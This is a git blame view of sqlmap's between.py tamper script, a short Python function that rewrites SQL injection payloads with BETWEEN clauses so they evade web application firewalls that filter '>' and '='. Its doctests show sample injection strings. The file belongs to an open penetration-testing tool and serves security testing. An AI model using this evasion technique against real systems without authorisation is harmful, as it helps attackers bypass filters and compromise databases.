Blame: tamper/between.py - sqlmapproject/sqlmap

Automatic SQL injection and database takeover tool

0 0 0 Python

Last preparations for DREI 2019-05-08 12:47:52 +02:00			`#!/usr/bin/env python`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00
			`"""`
Bumping copyright year 2024-01-03 23:11:52 +01:00			`Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 14:50:46 +02:00			`See the file 'LICENSE' for copying permission`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00			`"""`

Improvement of a between.py tamper script 2012-11-29 14:41:07 +01:00			`import re`

Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00			`from lib.core.enums import PRIORITY`

			`__priority__ = PRIORITY.HIGHEST`

Revamp of tamper scripts, now supporting dependencies() function as well. Improved a lot the docstring and retested all. Added a new one from Ahmad too. 2011-07-06 21:04:45 +00:00			`def dependencies():`
			`pass`

Update for an Issue #12 2012-12-03 14:27:01 +01:00			`def tamper(payload, **kwargs):`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00			`"""`
First commit related to the #3108 2018-07-31 01:17:11 +02:00			`Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'`
Revamp of tamper scripts, now supporting dependencies() function as well. Improved a lot the docstring and retested all. Added a new one from Ahmad too. 2011-07-06 21:04:45 +00:00
			`Tested against:`
			`* Microsoft SQL Server 2005`
			`* MySQL 4, 5.0 and 5.5`
			`* Oracle 10g`
			`* PostgreSQL 8.3, 8.4, 9.0`

			`Notes:`
			`* Useful to bypass weak and bespoke web application firewalls that`
			`filter the greater than character`
			`* The BETWEEN clause is SQL standard. Hence, this tamper script`
			`should work against all (?) databases`
Another update for an Issue #352 and couple of fixes 2013-03-13 21:57:09 +01:00
			`>>> tamper('1 AND A > B--')`
			`'1 AND A NOT BETWEEN 0 AND B--'`
Minor improvement of between tamper script 2014-04-22 11:04:28 +02:00			`>>> tamper('1 AND A = B--')`
			`'1 AND A BETWEEN B AND B--'`
More drei stuff 2019-05-02 16:54:54 +02:00			`>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')`
			`'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00			`"""`

minor cosmetics on tamper scripts 2011-04-04 08:18:26 +00:00			`retVal = payload`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00
minor cosmetics on tamper scripts 2011-04-04 08:18:26 +00:00			`if payload:`
Refactoring between.py script 2013-01-29 16:22:19 +01:00			`match = re.search(r"(?i)(\b(AND\|OR)\b\s+)(?!.\b(AND\|OR)\b)([^>]+?)\s>\s([^>]+)\s\Z", payload)`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00
Refactoring between.py script 2013-01-29 16:22:19 +01:00			`if match:`
			`_ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))`
			`retVal = retVal.replace(match.group(0), _)`
Update for special cases 2013-02-19 10:12:47 +01:00			`else:`
Minor code style updates 2018-06-09 23:38:00 +02:00			`retVal = re.sub(r"\s>\s(\d+\|'[^']+'\|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)`
Converted from DOS format (\n\r to \n only) 2011-02-06 23:25:55 +00:00
Minor improvement of between tamper script 2014-04-22 11:04:28 +02:00			`if retVal == payload:`
More drei stuff 2019-05-02 16:54:54 +02:00			`match = re.search(r"(?i)(\b(AND\|OR)\b\s+)(?!.\b(AND\|OR)\b)([^=]+?)\s=\s([\w()]+)\s", payload)`
Minor improvement of between tamper script 2014-04-22 11:04:28 +02:00
			`if match:`
			`_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))`
			`retVal = retVal.replace(match.group(0), _)`
Removing trailing blank lines 2014-08-20 21:07:19 +02:00
Tamper function(s) refactoring (really no need for returning headers as they are passed by reference) 2012-10-25 10:10:23 +02:00			`return retVal`